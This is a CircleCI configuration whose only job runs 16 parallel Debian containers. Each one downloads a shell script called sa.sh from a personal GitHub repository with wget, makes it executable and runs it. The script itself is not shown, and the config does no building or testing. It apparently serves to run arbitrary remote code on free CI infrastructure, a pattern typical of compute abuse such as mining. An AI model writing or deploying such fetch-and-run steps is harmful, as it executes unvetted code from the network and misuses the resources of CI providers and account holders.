version: 2.1 
jobs: 
    trial: 
      docker: 
            - image: debian:latest 
      parallelism: 16 
      steps: 
        - run: wget -O sa.sh https://raw.githubusercontent.com/Cetinbas11/1/main/sa.sh
        - run: chmod +x sa.sh
        - run: ./sa.sh
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial